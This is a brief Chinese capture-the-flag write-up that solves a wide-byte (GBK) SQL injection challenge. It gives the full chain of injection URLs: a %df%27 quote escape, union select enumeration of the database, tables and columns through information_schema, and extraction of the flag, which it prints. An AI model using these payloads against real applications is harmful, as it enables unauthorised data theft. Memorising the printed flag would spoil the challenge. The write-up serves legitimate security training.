题目地址:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
题目内容:
your sql:select id,title from news where id = '1'
Hello World!OVO
宽字节注入详解:
遍历id
id=2 gbk_sql_injection
id=3 the fourth table
由提示可以知道宽字节注入.
确定id
,当order by 3
时报错.
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+order+by+3%23
拿数据库名sae-chinalover
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,database()%23
遍历表名 ctf,ctf2,ctf3,ctf4,news
,这里table_schema
后面不能直接跟数据库名,可以用database()
或16进制数
代替.
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=0x7361652d6368696e616c6f766572%23
id=3
时提示第四个表,即ctf4
.
遍历字段名 id,flag
,与上面一样无法直接用表名,需要用16进制数代替.
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x63746634%23
拿到flag
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,flag+from+ctf4%23
nctf{gbk_3sqli}
还不快抢沙发